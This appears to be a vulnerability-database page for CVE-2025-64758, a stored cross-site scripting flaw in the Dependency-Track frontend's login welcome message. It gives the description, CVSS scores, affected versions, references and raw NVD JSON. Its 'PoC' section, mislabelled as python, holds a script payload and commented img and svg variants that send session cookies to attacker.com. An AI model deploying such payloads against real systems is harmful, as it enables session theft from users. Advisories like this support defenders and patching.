CVE-2025-64758

Description

@dependencytrack/frontend is a Single Page Application (SPA) used in Dependency-Track, an open source Component Analysis platform that allows organizations to identify and reduce risk in the software supply chain. Since version 4.12.0, Dependency-Track users with the SYSTEM_CONFIGURATION permission can configure a "welcome message", which is HTML that is to be rendered on the login page for branding purposes. When rendering the welcome message, Dependency-Track versions before 4.13.6 did not properly sanitize the HTML, allowing arbitrary JavaScript to be executed. Users with the SYSTEM_CONFIGURATION permission (i.e., administrators), can exploit this weakness to execute arbitrary JavaScript for users browsing to the login page. The issue has been fixed in version 4.13.6.

CVSS Details

CVSS Score

4.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

@dependencytrack/frontend >= 4.12.0 且 < 4.13.6

Dependency-Track Frontend 4.12.0

Dependency-Track Frontend 4.12.1

Dependency-Track Frontend 4.12.2

Dependency-Track Frontend 4.12.3

Dependency-Track Frontend 4.12.4

Dependency-Track Frontend 4.12.5

Dependency-Track Frontend 4.12.6

Dependency-Track Frontend 4.13.0

Dependency-Track Frontend 4.13.1

Dependency-Track Frontend 4.13.2

Dependency-Track Frontend 4.13.3

Dependency-Track Frontend 4.13.4

Dependency-Track Frontend 4.13.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- PoC for CVE-2025-64758: Stored XSS in Welcome Message -->
<!-- This payload should be entered in the Welcome Message configuration field -->

<script>
  // Steal session cookies
  document.cookie.split(';').forEach(cookie => {
    fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(cookie), {
      method: 'GET',
      mode: 'no-cors'
    });
  });
  
  // Redirect to phishing page
  // window.location.href = 'https://attacker.com/fake-login';
</script>

<!-- Alternative payload using img tag with onerror -->
<!-- <img src=x onerror="fetch('https://attacker.com/steal?data='+document.cookie)"> -->

<!-- Alternative payload using SVG -->
<!-- <svg/onload=fetch('https://attacker.com/steal?data='+btoa(document.cookie))> -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64758
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64758
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64758/
[4] VulDB https://vuldb.com/cve/CVE-2025-64758
[5] https://github.com/DependencyTrack/frontend/commit/8fd757be612eaf4f35eadbe4c334204d7bd711be
[6] https://github.com/DependencyTrack/frontend/pull/1378
[7] https://github.com/DependencyTrack/frontend/pull/986
[8] https://github.com/DependencyTrack/frontend/security/advisories/GHSA-7xvh-c266-cfr5

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64758", "sourceIdentifier": "[email protected]", "published": "2025-11-17T18:15:58.450", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "@dependencytrack/frontend is a Single Page Application (SPA) used in Dependency-Track, an open source Component Analysis platform that allows organizations to identify and reduce risk in the software supply chain. Since version 4.12.0, Dependency-Track users with the SYSTEM_CONFIGURATION permission can configure a \"welcome message\", which is HTML that is to be rendered on the login page for branding purposes. When rendering the welcome message, Dependency-Track versions before 4.13.6 did not properly sanitize the HTML, allowing arbitrary JavaScript to be executed. Users with the SYSTEM_CONFIGURATION permission (i.e., administrators), can exploit this weakness to execute arbitrary JavaScript for users browsing to the login page. The issue has been fixed in version 4.13.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/DependencyTrack/frontend/commit/8fd757be612eaf4f35eadbe4c334204d7bd711be", "source": "[email protected]"}, {"url": "https://github.com/DependencyTrack/frontend/pull/1378", "source": "[email protected]"}, {"url": "https://github.com/DependencyTrack/frontend/pull/986", "source": "[email protected]"}, {"url": "https://github.com/DependencyTrack/frontend/security/advisories/GHSA-7xvh-c266-cfr5", "source": "[email protected]"}]}}